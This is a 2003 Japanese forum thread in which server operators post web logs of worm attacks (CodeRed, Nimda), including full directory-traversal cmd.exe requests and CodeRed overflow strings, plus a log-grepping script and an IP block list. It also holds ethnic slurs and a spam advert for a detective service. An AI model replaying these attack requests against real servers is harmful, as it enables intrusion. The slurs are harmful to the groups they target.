この鯖ワームにやられてます
自宅で鯖も善いけど、管理はちゃんとしようよ。 ログを汚すだけではなく、ネットワーク資源のムダ使いの CodeRedやNimdaその他のワームにやられてる鯖を教え合おう!! 管理者がこの板みて、対処を期待する。 2 get!! おー鯖管理に関する話題だな。 でもな、ワームによってはIP詐称してるのもアルからな そういうのはどうする>>1 ? IP詐称されてるってのが分かるだけでも当人?としては いいかも。やっぱ気持ち悪いじゃん。 ところで3ズサ━━━━⊂(゚Д゚⊂⌒`つ≡≡≡━━━━!! ラストクリスマスキタ━━━━━━(゚∀゚)━━━━━━━!!!!! 218.86.248.174 [08/Feb/2003:08:26:23 +0900] - > GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 218.114.46.157 [08/Feb/2003:10:57:07 +0900] - > GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 知らんなら本人に気づいて欲しいという意味でも晒しとくよ 無駄。apache のlogに記録されない様にするのがいい。 >>7 あんた馬鹿の一つ覚えを繰り返してるゴミ送信主かい? >>9 うちもYahooBBで、YahooBBにしてから(IPアドレスが218.*.*.*になってから)Nimdaの攻撃が激増したから聞いているだけなんだけど・・・ >>10 ここでも嫁 ttp://www.zdnet.co.jp/help/tips/linux/l0324.html >>11 確かに、YahooBB(218.*.*.* と219.*.*.*がほとんど43.*.*.* 220.*.*.*は少ない) はNimdaの攻撃が多い。www.bbtec.netはApache使ってるし DNS(dns**.bbtec.net)はBIND8使ってるから、一般ユーザが感染していると考えられる。 常時接続で、知らぬ間にIIS探ししてるんだよね。1スキャンで16ヒットするから ログ解析ツールwebalizer,mrtgその他を使うとすぐ分る。 根本解決は管理者に教えてあげることだけど、めんどくさく、難しい事も多い。 逆引き出来れば良い方で、IP偽ってるのも結構ある。 対処方法は、>>6 が言っているようにログに残らないようにするのが簡単。 仮にも管理者が決まっている鯖なら、いくらぐーたらでも さすがにCodeRed/Nimda/Slammer級のワームについては対策されてると思いたいが。。。 今ごろになってもNimdaやらまきちらしてるのは 知らないうちにIISが動いてて持ち主も把握してないようなマシンだろう。 そういう「持ち主」はいても「管理者」はいないようなマシンは リプレースされるまでそのままだと思うよ。 久々にNIMDA来た 219.180.170.51 - - [09/Feb/2003:22:38:17 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 447 久々にCodeRed来た 80.204.44.179 - - [10/Feb/2003:00:34:17 +0900] "GET /default.ida?NNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090% u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u5 31b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 309 "-" "-" ぷららのDDNSだけどぷららも結構多いよ。 nslookupで引くとほとんどがぷららさん・・・ >19 いまだにnslookup ( ´,_ゝ`)フ゜ッ ネームサーバをさせるわけでもないのに、 わざわざ dig や host のために bind for win をインストールしたり、 dnsip やら dnsipq やらのためにわざわざパッチ当てて djbdns をコンパイルするのはアレだし。 この程度のことならば nslookup でも特に問題にならんと思うんだけど、 他に Windows で使えるいいツール知らんかい? >>20 218.200.211.35 - - [10/Feb/2003:07:28:37 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 318 "-" "-" 218.200.211.35 - - [10/Feb/2003:07:28:41 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 316 "-" "-" 218.200.211.35 - - [10/Feb/2003:07:28:42 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-" 218.200.211.35 - - [10/Feb/2003:07:28:42 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-" 218.200.211.35 - - [10/Feb/2003:07:29:04 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340 "-" "-" 218.200.211.35 - - [10/Feb/2003:07:29:05 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 357 "-" "-" 218.200.211.35 - - [10/Feb/2003:07:29:06 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 357 "-" "-" 218.200.211.35 - - [10/Feb/2003:07:29:07 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 373 "-" "-" 218.200.211.35 - - [10/Feb/2003:07:29:07 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-" 218.200.211.35 - - [10/Feb/2003:07:29:08 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-" 218.200.211.35 - - [10/Feb/2003:07:29:09 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-" 218.200.211.35 - - [10/Feb/2003:07:29:10 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-" 218.200.211.35 - - [10/Feb/2003:07:29:10 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 323 "-" "-" 218.200.211.35 - - [10/Feb/2003:07:29:11 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 323 "-" "-" 自動的にワームからのアクセスがあったときに root@アクセス元IPアドレス とかに警告メール出すようなソフトだれか作ってくり。 >>24 make test PERL_DL_NONLAZY=1 /usr/bin/perl -Iblib/arch -Iblib/lib -I/usr/libdata/perl/5.00503/mach -I/usr/libdata/perl/5.00503 test .pl 1..1 Can't locate warnings.pm in @INC (@INC contains: blib/arch blib/lib /usr/libdata/perl/5.00503/mach /usr/libdata/perl/5.0 0503 /usr/libdata/perl/5.00503/mach /usr/libdata/perl/5.00503 /usr/local/lib/perl5/site_perl/5.005/i386-freebsd /usr/loc al/lib/perl5/site_perl/5.005 .) at blib/lib/Apache/CodeRed.pm line 4. BEGIN failed--compilation aborted at blib/lib/Apache/CodeRed.pm line 4. BEGIN failed--compilation aborted at test.pl line 10. *** Error code 2 Stop in /tmp/Apache-CodeRed-1.07 >>23 警告メールは、やっぱり、 「回線切って、首つって、氏ね」 みたいなの? >>19 それってぷららのDDNS使ってるからじゃない? Nimdaはご近所さん攻撃するものだし。 確かにNimdaは感染したマシンのセグメント付近に攻撃するよね。 所詮DDNSは、とりあえず立てましたって人が使うから管理甘いのよね。 >>23 こんだけ騒がれてるのにいまだにワームをまきちらかしてるような奴が そんなの読むわけないと思われ。 だいたいWindowsが多いんだからrootに出してもまず無意味。 net send(smbclient -M)を送り返すとかしたほうがまだしも効果があるだろう。 久々だな。 62.217.134.16 - - [13/Feb/2003:19:21:53 +0900] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801% u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 226 最近codered多くない? しばらくこなかったけど 最近1日3回位くるYO ちなみに屋不ーBB [Thu Feb 13 18:32:04 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..チ/winnt/system32/cmd.exe [Thu Feb 13 18:32:05 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..タッ/winnt/system32/cmd.exe [Thu Feb 13 18:32:05 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..チ?/winnt/system32/cmd.exe [Thu Feb 13 18:32:07 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..%5c/winnt/system32/cmd.exe [Thu Feb 13 18:32:07 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..%2f/winnt/system32/cmd.exe 俺みたいにISDNで鯖をやってるようなヤシの所にも来るのか・・・ >>33 うちもYahoo!BBだよ。 多すぎってほどじゃないけど、やっぱり日に2〜5件くらいはくるですねぇ。 ……と、access_logをgrepして気が付きますた。 全然久々じゃないじゃないか (w お前らみたいな糞坊が鯖なんか立てるから、ウィルスが万円して逝くんだよ もっと勉強してから立てれ 漏れの所も… その1 [Fri Feb 14 21:44:55 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/scripts [Fri Feb 14 21:44:55 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/MSADC [Fri Feb 14 21:44:56 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/c [Fri Feb 14 21:44:56 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/d その2 [Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/scripts [Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/MSADC [Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/c [Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/d 両方ともにahoo!BB。 頼むよ。漏れもahoo!BBなんだけどさ(涙 うちもぷららのDDNS使ってますが、サーバ開通直後に わんさか来たので、ログの一部をサポートセンターに 送って対処をお願いしたら、それ以後は随分少なく なりましたよ。まあ、偶然かもしれませんが... やっぱり偶然でした(T_T) どうやら、土日はお休みで電源が落ちていただけの模様です。 ただのパソコンなんだろうな... 友人のケースでは、相手を特定して電話してやっと解決したってケースがありました。 相手は設計事務所のサーバーだったそうです。 それだから連絡先がわかった、と いうことでもありますが。 プロバイダーはシカトを決め込んでいたそうです。 少々のワームやウイルスはいちいちかまってられないが、 前OCNユーザーから1日200通のウイルスメールがきたときは さすがにたまりかねてOCNに連絡したよ… 鯖とは関係ない話だがな… 218.9.76.4 - - [07/Mar/2003:22:22:26 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215 218.11.16.6 - - [06/Mar/2003:21:32:04 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215 218.4.144.106 - - [06/Mar/2003:21:09:25 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215 218.12.182.39 - - [06/Mar/2003:07:46:12 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215 いい加減蝋人形にしちゃうよ?! 218.9.6.222 - - [08/Mar/2003:12:13:13 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-" 218.18.18.72 - - [08/Mar/2003:15:38:43 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-" 218.27.89.97 - - [08/Mar/2003:18:23:39 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-" 218.6.243.62 - - [08/Mar/2003:19:01:17 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-" 218.244.75.70 - - [08/Mar/2003:20:31:32 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-" いい加減蝋人形にしちゃうよ?! 本日のニムダアクセス 韓国 61.250.216.1 中国 61.132.75.252 #!/bin/sh if [ $1 ] && [ -f $1 ]; then ACCESS_LOG=$1 elif [ -f /usr/local/apache/logs/access_log ]; then ACCESS_LOG=/usr/local/apache/logs/access_log else echo "usage: $0 path_to_access_log" exit 1 fi egrep "cmd.exe|root.exe|NNNNNN" $ACCESS_LOG \ | awk '{ print $4,$5,$1; }' \ | sort -k 3,3 -u | sort -k 1,1 \ | sed -e 's/^/スキャン歓迎: /g' | more exit 0 "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215 上のようなログがたくさんあるんですが、404じゃなくて302なのです・・・。 なんでかわかるかた教えてくださいm(__)m これはどうなのかな。。。 [Sun Mar 09 23:10:05 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..チ/winnt/system32/cmd.exe [Sun Mar 09 23:10:07 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..タッ/winnt/system32/cmd.exe [Sun Mar 09 23:10:09 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..チ・winnt/system32/cmd.exe [Sun Mar 09 23:10:15 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..%5c/winnt/system32/cmd.exe [Sun Mar 09 23:10:20 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..%2f/winnt/system32/cmd.exe ∋8ノノハ.∩ 川o・-・)ノ <先生!こんなのがありました! __/ / / \(_ノ ̄ ̄ ̄\ ||ヽ|| ̄ ̄ ̄ ̄|| ...|| ̄ ̄ ̄ ̄|| http://saitama.gasuki.com/saitama/ うちも、チョンとチャンコロばっかりです。 http://www.arearesearch.co.jp/ip-kensaku.html 今日は珍しく、アメリカのDSL回線とアラブ首長国連邦があった default.ida?XXXXX...増殖中。 0件: 5/Mar 0件: 6/Mar 0件: 7/Mar 0件: 8/Mar 0件: 9/Mar 0件: 10/Mar 12件: 11/Mar 48件: 12/Mar 上にもあるが、最近こんなヤシが来るんですがこれもCODEREDだよね? 2003/03/13(13:14:12) W-SV 219.*.***.*** [80] 404 237 "GET / default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXY090V858\bd3W801Y090 V858\bd3W801Y090V858\bd3W801Y090Y090X190P0c3P003Xb00U31bU3ffP078 P000P0=a HTTP/1.0" 今まで見たNNNってヤシと違うもんだから気になって、、 韓国と中国がものすごく多い。 あと、日本国内だと普通の企業とか。 ここ数日はCodeRed IIが多いですね、国内外を問わず。 荒らしてくれるのは、 愛知、神奈川、埼玉あたりが多いです。 我々に直接的な害はないんですがね。 見てて気持ち悪いですよ。 こんなの出てた 61.191.128.106 - - [15/Mar/2003:20:26:20 +0900] "GET /default.ida?XXXX XXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275 61.48.32.168 - - [15/Mar/2003:20:33:57 +0900] "GET /default.ida?XXXXXX XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275 61.83.171.22 - - [15/Mar/2003:22:54:03 +0900] "GET /default.ida?XXXXXX XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 276 CodeRedII多いなぁ 219.168.40.15 - - [15/Mar/2003:06:09:38 +0900] "GET /default.ida?XXXXXXXXXXXXXX 219.93.193.170 - - [15/Mar/2003:12:12:01 +0900] "GET /default.ida?XXXXXXXXXXXXX 219.94.102.51 - - [15/Mar/2003:16:44:21 +0900] "GET /default.ida?XXXXXXXXXXXXXX 219.145.159.175 - - [15/Mar/2003:17:57:31 +0900] "GET /default.ida?XXXXXXXXXXXX 219.138.9.227 - - [15/Mar/2003:19:18:09 +0900] "GET /default.ida?XXXXXXXXXXXXXX 218.64.67.194 - - [15/Mar/2003:18:26:32 +0900] "GET /default.ida?XXXXXXXXX 流行ってるね。 設置者は居ても、管理者が居ない鯖が多いということで ★あなたのお悩み解決致します!! ●浮気素行調査 彼氏、彼女、妻、夫の浮気を調査致します!! ●盗聴器盗撮機発見 あなたの部屋に誰かが仕掛けているかも!! ●行方調査 行方不明になっている家族の消息を調査致します!! ●電話番号から住所割り出し 一般電話、携帯から住所を割り出し致します!! ●ストーカー対策 社会問題ともなっているストーカーを撃退致します!! その他人生相談からどんなお悩みでも解決いたします!! 直通 090−8505−3086 URL http://www.h5.dion.ne.jp/ ~grobal/ メール hentaimtt@k9.dion.ne.jp グローバル探偵事務局 003/03/16(20:32:54) W-SV 61.199.98.125 [80] 200 950 "GET /kiyaku.html HTTP/1.1" 2003/03/16(20:33:31) W-SV 61.251.250.14 [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0" 2003/03/16(20:33:32) W-SV 61.251.250.14 [80] 404 240 "GET /MSADC/root.exe?/c+dir HTTP/1.0" 2003/03/16(20:33:32) W-SV 61.251.250.14 [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/03/16(20:33:33) W-SV 61.251.250.14 [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/03/16(20:33:36) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/scripts/..\../winnt/system32/cmd.exe" ]" 2003/03/16(20:33:36) W-SV 61.251.250.14 [80] 403 262 "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/03/16(20:33:37) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/_vti_bin/..\../..\../..\../winnt/system32/cmd.exe" ]" 2003/03/16(20:33:37) W-SV 61.251.250.14 [80] 403 275 "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/03/16(20:33:41) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/_mem_bin/..\../..\../..\../winnt/system32/cmd.exe" ]" 2003/03/16(20:33:41) W-SV 61.251.250.14 [80] 403 275 "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/03/16(20:33:44) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/msadc/..\../..\../..\/..チ../..チ../..チ../winnt/system32/cmd.exe" ]" 2003/03/16(20:33:44) W-SV 61.251.250.14 [80] 403 291 "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/03/16(20:33:45) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/scripts/..チ../winnt/system32/cmd.exe" ]" 2003/03/16(20:33:45) W-SV 61.251.250.14 [80] 403 263 "GET /scripts/..チ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" CodeRedIIウザー(´Д`; 219.138.52.14 - - [19/Mar/2003:00:45:01 +0900] "GET /default.ida? 219.234.238.253 - - [18/Mar/2003:18:09:40 +0900] "GET /default.ida? 219.215.44.61 - - [18/Mar/2003:20:44:08 +0900] "GET /default.ida? 219.138.1.212 - - [19/Mar/2003:01:34:27 +0900] "GET /default.ida? 219.68.217.243 - - [19/Mar/2003:01:50:51 +0900] "GET /default.ida? 中国でもWindowsServer使ってるのか・・・ テストのため1日晒してただけで結構来るねぇ。 迷惑。マシンごと逝ってくれ、とくに220.13.136.85 YahooBB220013136085.bbtec.net - - [18/Mar/2003:04:00:21 +0900] "GET /default.ida?XXXXXXXXX YahooBB220013232179.bbtec.net - - [18/Mar/2003:07:09:43 +0900] "GET /default.ida?XXXXXXXXX YahooBB220027008006.bbtec.net - - [19/Mar/2003:09:17:43 +0900] "GET /default.ida?XXXXXXXXX >>71 うちも220.*.*.*からばかり来てるな。 まだそれほど多いと感じて無いけど。 61.236.229.237からCodeRedが北んで、何かと思ってアクセスしたら、 www.okxa.comというドメインのサイトですた。 何、ココ?エロゲサイト? うちは、1日に、CodeRedが34回、Nimdaが32回なんてのも、 普通だす。 なんとかしたいのでつが・・・ サーバーは、BIGLOBEです。。 >>73 下にメアド書いてあるじゃん。とりあえず英語と中国語?で文句言ってみれば? まぁ、MicroSoftのWebサイトにCodeRed.F対策のアナウンスが挙がってるんだから 身に覚えのある人はパッチをあてて欲しいですね 最近やたらCodeRedII多くないかい? 218.***.***.***から目茶苦茶(100/day程度)来るんだけど あーうぜー 初めて見た。 210.220.73.20 - - [02/Apr/2003:06:56:31 +0900] "GET / HTTP/1.1" 200 765 "-" "-" 210.220.73.20 - - [02/Apr/2003:06:56:32 +0900] "GET /NULL.printer HTTP/1.1" 404 1059 "-" "-" 210.220.73.20 - - [02/Apr/2003:06:56:32 +0900] "GET /NULL.IDA?CCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%udacf%u77ee%u 0000%u0000%u838b%u0094%u0000%u408・・・以降文字化けで表示できない SYN Flood Attackしてくる香具師もなんとかしる >78 ウチにも来たよ 211.189.57.126から 最初はイタズラされてるだけあかと持ったんだけど、新しいワームかね? 相手はコーリャンのIISでした。 211.158.61.191 - - [06/Apr/2003:05:12:15 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:12:20 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:12:25 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:12:31 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:12:36 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:12:41 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:12:47 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:12:52 +0900] "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:12:57 +0900] "GET /scripts/..チ../winnt/system32/cmd.exe HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:13:02 +0900] "GET /scripts/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:13:08 +0900] "GET /../winnt/system32/cmd.exe HTTP/1.0" 403 194 211.158.61.191 - - [06/Apr/2003:05:13:13 +0900] "GET /../winnt/system32/cmd.exe HTTP/1.0" 403 194 211.158.61.191 - - [06/Apr/2003:05:13:18 +0900] "GET /scripts/..l5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:13:24 +0900] "GET /scripts/..l5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:13:29 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:13:34 +0900] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 404 215 ウザい。 どかーん! (⌒⌒⌒) || / ̄ ̄ ̄ ̄ ̄\ | ・ U | | |ι |つ U||  ̄ ̄ ||  ̄  ̄ もうおこったぞう 61.232.0.1-61.237.255.254<!-- (CN)CHINA RAILWAY TELECOMMUNICATIONS CENTER --> 218.13.0.1-218.18.255.254<!-- (CN) CHINANET Guangdong province network Data Communication Division China Telecom --> 218.144.0.1-218.159.255.254<!-- (KR)KOREA TELECOM Network Management Center --> 220.64.0.1-220.71.255.254<!-- (KR)KRNIC Korea Network Information Center --> 220.72.0.1-220.87.255.254<!-- (KR)KOREA TELECOM Network Management Center --> 220.112.0.1-220.115.255.254<!-- (CN)Greatwall Broadband Network Co.Ltd. --> 220.163.0.1-220.165.255.254<!-- (CN)CHINANET yunnan province network China Telecom --> アク禁 >80 >最初はイタズラされてるだけあかと持ったんだけど、 いたずらしないで頂きたい。 ログ汚れ過ぎ IIS狙われすぎ ついでにsage過ぎ あれ以来きてない。 >83 正解かも どうもアタックの内容がアレなせいで落ちてるっぽいのよね IPアドレスじゃなくてドメインで狙われてるっぽいし・・・ これは? 09.191.15.2 - - [09/Apr/2003:08:04:57 +0900] "GET /cgi-bin/formmail.pl HTTP/1.0" 404 1184 209.191.15.2 - - [09/Apr/2003:08:05:01 +0900] "GET /cgi-bin/formmail.cgi HTTP/1.0" 404 1184 209.191.15.2 - - [09/Apr/2003:08:05:03 +0900] "GET /cgi-bin/FormMail.pl HTTP/1.0" 404 1184 209.191.15.2 - - [09/Apr/2003:08:05:05 +0900] "GET /cgi-bin/FormMail.cgi HTTP/1.0" 404 1184 209.191.15.2 - - [09/Apr/2003:08:05:09 +0900] "GET /cgi-sys/formmail.pl HTTP/1.0" 404 1184 209.191.15.2 - - [09/Apr/2003:08:05:10 +0900] "GET /cgi-sys/formmail.cgi HTTP/1.0" 404 1184 wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:21 +0900] "GET /cgi-sys/formmail.cgi HTTP/1.0" 404 1184 wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:22 +0900] "GET /cgi-sys/FormMail.pl HTTP/1.0" 404 1184 wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:22 +0900] "GET /cgi-bin/Formmail.pl HTTP/1.0" 404 1184 wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:24 +0900] "GET /cgi-bin/mail.pl HTTP/1.0" 404 1184 wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:25 +0900] "GET /cgi-bin/FORMMAIL.PL HTTP/1.0" 404 1184 板違いだけどついでにこれも 0-2pool57-34.nas10.lansing2.mi.us.da.qwest.net - - [08/Apr/2003:13:58:44 +0900] "CONNECT mailin-04.mx.aol.com:25 HTTP/1.0" 405 992 "-" "-" 多分オープンプロキシの検索ロボットだけど、踏み台に利用されないように。 >>86 は任意の宛先に送信できるメール送信 CGI を狙った spammer。 >>87 は外部から任意のポートに接続できるプロクシを狙った spammer。 あの手、この手ですよね。 まえにスパムを配信するウイルスの実験が行われていた可能性があると 記事で読んだ記憶があるけど。 スパムとワーム。何かオーバラップらして見えてくるのは自分だけかな。 メールヘッダーが変なんですけど。何かわかりますかね。 ヘッダーは2.4KBあり、、Comments:の行がやたら長いです。 本文はスパムみたいなんですけど、sendmailのバグを狙っているような... ワームの様な気もしてます。。。 Return-Path: <mailbox1@usgreencardoffice.com> Received: from smtp1.cwidc.net (smtp1.cwidc.net [154.33.63.111]) by xxxx.jp (8.12.8/8.12.5) with ESMTP id h3BDBGKZ017325 for <xxxxx@xxxxx.jp>; Fri, 11 Apr 2003 22:11:19 +0900 Received: from [154.33.63.58] (helo=mail8.cwidc.net) by smtp1.cwidc.net with esmtp (Exim 3.20 #4) id 193yJ3-0004So-00 for xxxxx@xxxxx.jp; Fri, 11 Apr 2003 22:11:01 +0900 Received: from pop by mail8.cwidc.net with local (Exim 3.20 #2) id 193yIz-0003BH-00 for xxxxx@xxxxx.jp; Fri, 11 Apr 2003 22:10:57 +0900 Received: from [206.40.228.122] (helo=sm22.localdomain) by mail8.cwidc.net with esmtp (Exim 3.20 #2) id 193yIy-0003AM-00; Fri, 11 Apr 2003 22:10:56 +0900 Received: from unknown Date: Fri, 11 Apr 2003 07:10:19 -0600 (MDT) Message-Id: <200304111310.h3BDAJIV019352@sm22.localdomain> Comments: Received: from PbD:C6?oC65]:?E6CB]@C];A|E2<6492?oC65]:?E6CB]@C];ANz B Received: from Jx2<2oC65]24|2:2:oC65]2?]688]@C];A|46J`geb_oC65]2?]688]@C];A|7FC F<2H2oC65]2?]688]@C];A|8@?K@FoC65]2?]688]@C];A|9\@oC65]2?]688]@C];ATx M Recei ved: from Ma92>2oC65]2?]688]@C];A|9:0?6EoC65]2?]688]@C];A|9:<2CFoC65]2?]688]@C]; A|:K>\AoC65]2?]688]@C];A|<2EF9:D2oC65]2?]688]@C];A|<:>:oC65]2?]688]@C];ATv T Re ceived: from 